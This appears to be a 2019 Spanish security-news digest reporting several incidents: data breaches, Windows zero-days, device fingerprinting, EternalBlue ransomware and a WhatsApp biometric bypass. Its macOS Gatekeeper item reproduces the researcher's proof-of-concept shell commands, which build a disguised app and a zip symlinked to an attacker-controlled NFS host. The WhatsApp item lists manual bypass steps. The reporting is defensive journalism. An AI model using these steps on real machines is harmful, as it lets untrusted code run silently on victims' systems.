Autor: Dgeldres

Brecha de seguridad en StackOverflow, filtrados datos de usuarios

Stack Overflow, uno de los sitios más grandes de preguntas y respuestas para programadores, reveló que unos ciberdelincuentes lograron explotar un error de seguridad gracias a que obtuvieron acceso no autorizado a su versión de producción.

La compañía asegura que los piratas informáticos ejecutaron solicitudes web privilegiadas, pero pudieron obtener acceso únicamente a una parte muy pequeña de los datos, incluida la dirección IP, los nombres y la dirección de correo electrónico.

«Entre el 5 de mayo y el 11 de mayo, el intruso contuvo sus actividades de exploración. El 11 de mayo, el intruso realizó un cambio en nuestro sistema para otorgarse un acceso privilegiado en la producción. Este cambio se identificó rápidamente y revocamos su acceso a toda la red. Comenzamos a investigar la intrusión y se tomaron medidas para remediarla».

«Ahora podemos confirmar que nuestra investigación sugiere que las solicitudes en cuestión afectaron a aproximadamente 250 usuarios de la red pública. Nosotros notificaremos a los usuarios afectados».

Mary Ferguson, vicepresidenta de ingeniería de Stack Overflow

Además, la empresa ha confirmado que el error explotado se encontraba en un cambio recientemente implementado, el cual ya ha sido parcheado.

Más información:
https://techcrunch.com/2019/05/16/stack-overflow-data-breach/

Opensouthcode, el evento de tecnologías abiertas

El Polo Digital de Málaga acogerá los próximos viernes 24 y sábado 25 de mayo la cuarta edición de Opensouthcode, conferencia dedicada a dar difusión, compartir experiencias y conocimientos en el ámbito del software libre, tecnologías abiertas y opensource.

Opensouthcode ya es un cita imprescindible para todos los que de una forma u otra, usan, colaboran y hacen crecer este tipo de tecnologías.

En esta edición se realizarán más de 50 actividades entre charlas, talleres y reuniones de varios grupos relacionados con las tecnologías abiertas, como MálagaScala, MálagaJUG (Java User Group), WordPressMálaga, Linux-Málaga, RubyMálaga, DrupalMálaga, R-Málaga y Wikimedia España .

Las temáticas de las actividades serán de lo más diversa dentro del mundo tecnológico:  sistemas, machine learning, presentación de proyectos libres, seguridad, desarrollo web, entre otras muchas.

Además, tras el éxito de la pasada edición, el sábado por la mañana se realizará la sección especial para niños: OpensouthKids donde los más pequeños podrán iniciarse en la programación de videojuegos.

El evento es totalmente gratuito previo registro en su web. Más información, programa completo y registro en la web del evento: https://www.opensouthcode.org

Publicado exploit para vulnerabilidad no parcheada en Windows 10

Un investigador de seguridad ha publicado un exploit a modo de prueba de concepto para unavulnerabilidad no parcheada en Windows 10.

‘SandboxEscaper’, un investigador anónimo que ha hecho públicas varias vulnerabilidades de seguridad para Windows en los últimos meses (como esta que ya os contamos en Una Al Día), publicó ayer una prueba de concepto para una nueva vulnerabilidad de Windows 10.

Como es habitual en las publicaciones de este investigador, aún no existe ningún parche de seguridad que solucione el fallo, por lo que se recomienda extremar las precauciones al ejecutar ficheros descargados de Internet mientras se lanza el parche de seguridad.

La vulnerabilidad permite elevar privilegios en el sistema, de manera que puede ser utilizada por un atacante o malware que ya tenga acceso alsistema para obtener privilegios de sistema.

La prueba de concepto publicada hace uso de la función ‘SchRpcRegisterTask’una función del programador de tareas de Windows para programar nuevas tareas en el sistema. El problema se encuentra en el chequeo de permisos, que no se realiza correctamente y permite configurar unos permisos arbitrarios para la tarea.

Gracias a este problema, un programa malicioso podría ejecutar un fichero ‘.job’ que se encargue de registrar un servicio con privilegios de sistema y realice las acciones maliciosas.

La prueba de concepto ha sido publicada en Github: https://github.com/SandboxEscaper/polarbearrepo

Más información:

Fuentehttps://thehackernews.com/2019/05/windows-zero-day-vulnerability.html

Filtrados datos de 4,5M de visitantes de la web de La Alhambra

En la filtración pueden encontrarse números de teléfono, DNI, emails, contraseñas en texto plano, cuentas corrientes y más información sensible.

El grupo español La 9 de Anonymous ha revelado una brecha de seguridad en la web de reservas de La Alhambra de Granada, monumento ubicado en la comunidad de Andalucía y visitado por millones de usuarios al año. No es necesario haber reservado a través de la web para verse expuesto, ya que la misma es utilizada por múltiples agencias de reservas.

La vulnerabilidad, al menos presente desde 2017, consistía en una inyección SQL de manual, que según ha podido confirmar Teknautas se trataría de un fallo de fácil explotación, y probablemente detectable usando herramientas accesibles por todo el mundo con SQLMap y sin demasiados conocimientos de seguridad. Además, la explotación resultaba mucho más sencilla debido a que el servidor no contaba con WAF.

La filtración incluye los datos de 4,5 millones de visitantes, abarcando número de teléfono, DNI, correo electrónico, dirección postal, edad y sexo, entre otros datos. Esta parte de la filtración no incluye contraseñas, al no usar la web login para los visitantes.

La que sí incluye contraseñas es la filtración de los datos de agencias de viajes. Cerca de 1000 agencias han visto sus datos expuestos, incluyendo contraseñas en texto plano, una clara negligencia penable por la Ley de Protección de Datos. Por si fuese poco, también se almacenaban las cuentas corrientes con su IBAN.

Hiberus, la empresa responsable del software comprometido, ha lanzado unanota de prensa intentando quitar gravedad a los hechos. En ella se afirma que se trataría de un «ataque informático profesional y organizado», y ha añadido en un comunicado enviado a El Confidencial que, «a fecha de hoy, cualquier incidente que haya podido ocurrir está resuelto y correctamente gestionado». Sin embargo, hay otras webs del mismo grupo que aún no han corregido el error.

Bien es cierto que otras webs que usan este mismo software, como pueden ser las de los museos de El Prado o el Thyssen, cuentan desde hace tiempo con una versión actualizada que corrige este error. Sin embargo, no se han preocupado de actualizar otras webs más pequeñas, o la de La Alhambra, como se ha revelado con esta filtración.

Tras lo sucedido, queda patente la necesidad de realizar auditorías antes del lanzamiento de una aplicación de este tipo. Porque errores tan graves como almacenar en texto plano las contraseñas, o las cuentas corrientes en la misma base de datos, son fáciles de detectar y solucionar.

Fuente:
Agujero en la web de entradas a la Alhambra: los datos de 4,5 M de visitantes, al descubierto:
https://www.elconfidencial.com/tecnologia/2019-05-22/alhambra-hiberus-sicomoro-patronato-generalife-junta-andalucia_2013846/

 

Hacker revela cuatro 0-days de Microsoft en menos de un día.

Tras hacer pública una vulnerabilidad en Windows 10, la investigadora conocida por el alias «SandboxEscaper» ha liberado más exploits para vulnerabilidades aun sin parchear.

  • Vulnerabilidad AngryPolarBearBug2

Esta vulnerabilidad reside en el servicio de reporte de errores de Windows y puede ser explotada usando una operación en la DACL (lista de control de acceso discreccional). Este mecanismo permite o deniega permisos de acceso a un determinado objeto.

En una explotación satisfactoria, un atacante podría editar o borrar cualquier fichero de windows.

Bautizada como AngryPolarBearBug2 por la hacker, esta vulnerabilidad es sucesora de de otra descubierta por la investigadora a finales del pasado año (AngryPolarBearBug).

Sin embargo, según SandboxEscaper, esta vulnerabilidad no es trivial explotarla y puede tomar mas de quince minutos en dispararse, ya que la ventana de tiempo en la que el bug puede ser aprovechado es muy pequeña.

  • Internet Explorer 11 Sandbox Bypass

La segunda vulnerabilidad publicada ayer por la investigadora SandboxEscaper afecta a Internet Explorer 11.

Aunque el README del exploit no contiene ningún detalle sobre esta vulnerabilidad, un video subido por la investigadora muestra como el bug existe debido a un error del navegador a la hora de manejar una DLL maliciosa.

Esto permitiría a un atacante saltarse el sandbox del navegador y ejecutar código arbitrario con permisos de integridad medios.

A pesar de que las vulnerabilidades publicadas no son críticas, es de esperar que Microsoft libere actualizaciones el próximo 11 de Junio.

SandboxEscaper (¿Thomas Vanhoutte?) tiene un amplio historial de liberar pruebas de concepto perfectamente funcionales para el sistema operativo Windows. El pasado agosto publicó otra vulnerabilidad en el programador de tareas de Windows en su cuenta de twitter, que fue bastante aprovechada por los hackers en su momento.

Podemos esperar mas exploits en los próximos días, pues la investigadora ha prometido hacerlos públicos.

Más información

Zero-Day: Internet Explorer 11 Sandbox Bypass
https://www.youtube.com/watch?v=vgDt4CrmoRI 

Github angrypolarbearbug2
https://github.com/SandboxEscaper/polarbearrepo/tree/master/angrypolarbearbug2

Giuthub sandboxescape
https://github.com/SandboxEscaper/polarbearrepo/tree/master/sandboxescape

 

Filtrados datos de 139 millones de usuarios de Canva

Canva es un sitio web de herramientas de diseño gráfico y composición de imágenes, fundado en 2012, que facilita tanto a profesionales como a usuarios sin conocimientos de diseño la creación de contenidos utilizando el formato de arrastrar y soltar y proporcionando acceso a más de un millón de fotografías, gráficos y fuentes. Canva es una herramienta online, accesible desde dispositivos con navegadores completos. El sitio web de Canva se ha convertido en uno de los favoritos para crear sitios web rápidos, diseñar logotipos o campañas de marketing llamativas, etc.

Una brecha de seguridad no revelada en los servidores de Canva fue aprovechada para copiar las bases de datos de la empresa. La autoría de estos hechos ha sido reclamada por un pirata informático bajo el nickname ‘GnosticPlayers’, quien asevera haberse hecho con los datos de un total de aproximadamente 139 millones de usuarios durante la intrusión.

Según declaraciones realizadas por el propio pirata a Catalin Cimpanu de ZDNet, la intrusión tuvo lugar el viernes 24 de mayo por la mañana y habría conseguido descargar datos desde el 17 de mayo antes de que la empresa detectase la violación de seguridad y reaccionase cortando el acceso alservidor de bases de datos.

Los datos robados incluirían información de caracter personal y privado como nombres de usuarios, nombres reales, direcciones de correo electrónico, e información de residencia entre otros. También se han obtenido los hashes de las contraseñas de casi 61 millones de usuarios, aunque estos utilizan el algoritmo bcrypt que es considerado actualmente como uno de los más seguros. Para otros usuarios, la información robada contendría los tokens de Google utilizados para registrarse en el sitio sin establecer una contraseña.

Además, ZDNet ha tenido acceso a una muestra de los datos robados(18.816 cuentas, incluyendo a empleados y administradores de Canva) para contrastar la información proporcionada por el autor de los hechos y corroborar la veracidad de los mismos. Según declaraciones de Canva la compañía fue informada de una violación de seguridad que permitía el acceso a varios nombres de usuario y direcciones de correo electrónico y ya estaban alentando a sus usuarios a cambiar sus contraseñas como medida de precaución.

Este no se presenta como un ataque aislado por parte de GnosticPlayers, quien, desde el pasado mes de febrero, ha puesto a la venta en la Deep Web datos pertenecientes a 932 millones de usuarios provenientes de 44 empresas de todo el mundo, obtenidos aprovechando brechas de seguridad. Por lo que se puede presumir que los datos obtenidos de Canva seguirán el mismo destino.

Recientemente Canva adquirió dos de los sitios de contenido de stock gratuito más grandes del mundo: Pexels y Pixabay, sin embargo los datos correspondientes a los usuarios de estos dos sitios no se habrían visto comprometidos.

En cualquier caso, desde Hispasec recomendamos cambiar la contraseña a los usuarios de Canva y, si se ha reutilizado la misma contraseña para otros sitios web o servicios online modificarla también en ellos y usar una contraseña diferente para cada sitio.

Más información:
Australian tech unicorn Canva suffers security breach
https://www.zdnet.com/article/australian-tech-unicorn-canva-suffers-security-breach/

Sensores de calibración generan una huella única en dispositivos iOS y algunos Android

A partir de la información que exponen los sensores de nuestros dispositivos es posible realizar una identificación única entre todos los demás dispositivos, dejando un rastro de lo que visitamos en Internet. Este identificador único nunca cambia, incluso después de restaurar los valores de fábrica en el terminal.

Como ya sabemos, al acceder a una página web, el navegador expone información del dispositivo, como el nombre y versión del navegador, tamaño de la pantalla, fuentes instaladas, etc. Esta información sirve para crear una mejor experiencia para el usuario, aunque también puede ser utilizada para rastrearlo. Saber si estás de vuelta en una misma página o cuales son tus acciones en Internet, permitiendo, entre otros, a los anunciantes generar un perfil de usuario y, por lo tanto, una visión más específica de sus intereses personales.

Investigadores de la Universidad de Cambridge han desarrollado un nuevo ataque denominado Calibration fingerprinting attack o SensorIDUtilizan información recogida del acelerómetro, giroscopio y magnetómetro para generar una identificación única a nivel global del dispositivo. Este ataque afecta a los dispositivos iOS más que a Android puesto que Apple calibra los sensores en la línea de fábrica para mejorar la precisión de los sensores, cosa que pocos proveedores de Android hacen.

Esta identificación tiene las siguientes características:

  • Puede ser generada por cualquier app o sitio web que se visite, sin confirmación por parte del usuario.
  • Se tarda menos de un segundo en generar este ID.
  • El ID generado nunca cambia, incluso al restablecer el terminal.
  • Este ataque provee una forma efectiva de rastrear un dispositivo y navegador en Internet.

En respuesta a este fallo Apple ha añadido ruido en el output de ADC para que el identificador que se genera sea aleatorio y no se repita. Además, ha eliminado el acceso a la información de los sensores por defecto desde Mobile Safary en su actualización iOS 12.2.

Este fallo a nivel de privacidad ha sido identificado como CVE-2019-8541.

Más información:

ieee-security.org
https://www.ieee-security.org/TC/SP2019/papers/405.pdf

University of Cambridge
https://sensorid.cl.cam.ac.uk/

Salto de restricciones en MacOS X GateKeeper

Versiones de MacOS X anteriores a la 10.14.5 permitirían saltar las restricciones impuestas por Gatekeeper y ejecutar código no confiable sin necesidad de establecer permisos adicionales o notificar al usuario.

Gatekeeper es un mecanismo desarrollado por Apple e incluido en su sistema operativo para dispositivos de escritorio. Gatekeeper garantiza la verificación de aplicaciones descargadas desde terceros y obliga a los desarrolladores a firmar el código, evitando así que aplicaciones potencialmente fraudulentas se ejecuten sin el consentimiento del usuario.

El investigador de seguridad Filippo Cavallarin ha publicado en su página web una prueba de concepto en la que hace una demostración de unavulnerabilidad que permitiría a un atacante saltar esta protección y ejecutar código no verificado.

En su diseño, Gatekeeper considera las unidades externas y las redes compartidas como direcciones seguras y permite la ejecución de cualquier aplicación contenida en ellas. De forma legítima, Gatekeeper implementa dos características que combinadas, permitirían configurar el ataque: el auto-montado de carpetas en red y la posibilidad de que ficheros zip contengan enlaces simbólicos que apunten a direcciones arbitrarias.

Así, se podría pensar el siguiente escenario: un atacante elabora un fichero zip que contiene un enlace simbólico a una dirección controlada por el atacante, por ejemplo: Documents -> /net/atacante.com/Documents y lo envía a la víctima.

De esta forma, se ejecutaría el archivo en control del atacante, sin que Gatekeeper lo impida ni tan siquiera lo notifique.

De forma detallada, Filippo Cavallarin lo explica en la PoC publicada en su web:

  1. Creación de fichero zip con el enlace simbólico
    • mkdir Documents
    • ln -s /net/linux-vm.local/nfs/Documents Documents/Documents
    • zip -ry Documents.zip Documents
  2. Creación de la aplicación con el código a ejecutar
    • cp -r /Applications/Calculator.app PDF.app
    • echo -e ‘#!/bin/bash’»\n»‘open /Applications/iTunes.app’ > PDF.app/Contents/MacOS/Calculator
    • chmod +x PDF.app/Contents/MacOS/Calculator
    • rm PDF.app/Contents/Resources/AppIcon.icns
    • ln -s /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/GenericFolderIcon.icns PDF.app/Contents/Resources/AppIcon.icns
  3. Creación de la carpeta de red donde irá la aplicación
    • ssh linux-vm.local
    • mkdir -p /nfs/Documents
    • echo ‘/nfs/Documents *(insecure,rw,no_root_squash,anonuid=1000,anongid=1000,async,nohide)’ >> /etc/exports
    • service nfs-kernel-server restart
    • scp -r mymac.local:PDF.app /nfs/Documents/
  4. Alojamos el archivo zip en alguna localización remota, para que aldescargarlo Gatekeeper lo ponga en «cuarentena».
  5. A pesar de que Gatekeeper ha marcado el archivo para su comprobación, no se generará ninguna alerta y se ejecutará el código controlado por el atacante.

El fallo fue notificado el 22 de febrero de este año, sin embargo Apple todavía no ha publicado ningún parche oficial.

Más información:

MacOS X GateKeeper Bypass
https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass

EternalBlue dos años después: ataques contra ayuntamientos.

El ayuntamiento de Baltimore ha sido el último de una lista de corporaciones locales que incluye a los ayuntamientos de Pensilvania o Texas, entre otros, en sufrir ataques informáticos graves que paralizaron algunas infraestructuras críticas de la ciudad.

Vista de la ciudad de Baltimore

A pesar de que el código del exploit fue conocido hace ya más de dos añosa raíz de una filtración y de que Microsoft liberó las pertinentes actualizaciones de seguridad, aún existe una ingente cantidad de sistemas desactualizados en las administraciones. En el caso de Baltimore, ciudad que sólo destinaba un 2,5% de su presupuesto a ciberseguridad, los ataques han afectado a áreas tan diversas como las alertas de salud, facturación del agua, servicios de correo electrónico o ventas públicas, pagos de multas y comunicación del ayuntamiento con proveedores.

Es necesario recordar que fue la NSA quien, supuestamente, retuvo durante años el código del exploit sin avisar tan siquiera al proveedor de servicios afectado, Microsoft. Sólo cuando detectaron el robo de información se vieron obligados a reportar la incidencia a Microsoft. Sin embargo, la NSAjamás ha comparecido para aclarar lo sucedido de manera pública.

Un hecho diferenciador con respecto a otros ataques es el empleo de las propias herramientas de la NSA contra infraestructuras estadounidenses así como las reacciones despertadas en las corporaciones locales. Los responsables de los ayuntamientos han exigido información y medios a interlocutores del FBI y la NSA, quienes se niegan a comentar el asunto, provocando un conflicto entre distintos niveles de las administraciones.

La realidad es que, actualmente, existen más de un millón de equipos desactualizados que mantienen el puerto 445, objeto del ataque, expuesto a todo internet. La mayoría de esos sistemas se encuentran además en Estados Unidos.

Top 5 países vulnerables a EternalBlue: EEUU, Japón, Rusia, Alemania, Taiwan.

Dos años después, EternalBlue sigue operando como vector fundamental de distintos ataques informáticos. En el caso de Baltimore, fue un empleado público quien, víctima de un ataque de phishing, infectó el equipo con RobbinHood una variante nueva de ransomware que hace uso de EternalBlue. Lo que revela, fundamentalmente, dos aspectos del estado de la ciberseguridad actual.

En primer lugar, los ataques por ingeniería social, que involucran la explotación de las vulnerabilidades relacionadas con el factor humano, siguen siendo unade las superficies de exposición preferidas por los criminales. Lo que indica, a su vez, una deficiente formación de la población en materia de seguridad informática.

En segundo lugar, el éxito de ataques que hacen uso de EternalBlue, indica, en última instancia, la existencia de un parque de infraestructuras informáticas altamente desactualizadas. Un hecho que guarda relación directa con la dotación presupuestaria de las administraciones destinada a ciberseguridad.

Más información:

Baltimore ransomware attack: NSA faces questions
https://www.bbc.com/news/technology-48423954?intlink_from_url=https://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security&link_location=live-reporting-story

Eternally Blue: Baltimore City leaders blame NSA for ransomware attack
https://arstechnica.com/information-technology/2019/05/eternally-blue-baltimore-city-leaders-blame-nsa-for-ransomware-attack/

Hackers Are Holding Baltimore Hostage: How They Struck and What’s Next
https://www.nytimes.com/2019/05/22/us/baltimore-ransomware.html?module=inline

 

Hallada vulnerabilidad en la nueva función biométrica de Whatsapp

La nueva función de análisis biométrico agregada al servicio de mensajería instantánea Whatsapp presenta una vulnerabilidad que permitiría a un atacante acceder sin realizar la autentificación biométrica.

Resultado de imagen de whatsapp biometricExtraído de dignited.com

Después de varias semanas, tras la implantación del servicio de análisis biométrico para la autentificación del usuario en las cuentas de Whatsapp (https://www.biometricupdate.com/201901/biometric-authentication-coming-to-whatsapp), los especialistas del Instituto Internacional de Seguridad Cibernética han informado del descubrimiento de una vulnerabilidad que afecta a este nuevo servicio.

El reconocimiento biométrico para acceder a la aplicación mientras el terminal esté desbloqueado puede suponer una medida extra de seguridad con la que proteger el contenido confidencial de los usuarios, aunque aparentemente presenta algunos inconvenientes en su implementación. De momento solo está disponible para algunos dispositivos Apple.

Un usuario de la red social Reddit encontró un inconveniente de seguridad en esta nueva función que consiste en que un usuario puede acceder a WhatsApp desde la iOS Share Sheet sin necesidad de realizar previamente la identificación biométrica. De modo que si el usuario configura el inicio de sesión biométrico inmediato no se verá afectado por esta vulnerabilidad; sin embargo, si el usuario selecciona un intervalo de tiempo, el acceso a la iOS Share Sheet permite restablecer el temporizador, dejando el acceso a Whatsapp libre.

Según el usuario, el proceso para explotar esta falla es:

  • Acceder a la iOS Share Sheet, por ejemplo, a través de la aplicación de fotos.
  • Pulsar el icono de WhatsApp en la iOS Share Sheet.
  • Ir a la pantalla de inicio de iOS durante la transición a la siguiente pantalla, aprovechando que la verificación de FaceID o TouchID no se realiza si una opción diferente se establece en “inmediatamente” por adelantado.
  • Abrir WhatsApp, puesto que ya no se realizará la identificación biométrica (ya sea por reconocimiento facial o huellas dactilares).

Los equipos de seguridad de la red de Facebook, la compañía propietaria de WhatsApp, afirman que ya han identificado la vulnerabilidad y que están en proceso de implementar el correspondiente parche de seguridad. Mientras tanto, se recomienda que se configure el intervalo de bloque de pantalla en la opción “inmediatamente” si se desea seguir usando esta función de forma segura.

Más información:

Security Newspaper

  • https://www.securitynewspaper.com/2019/02/22/vulnerability-in-new-whatsapp-biometrics-feature-is-found/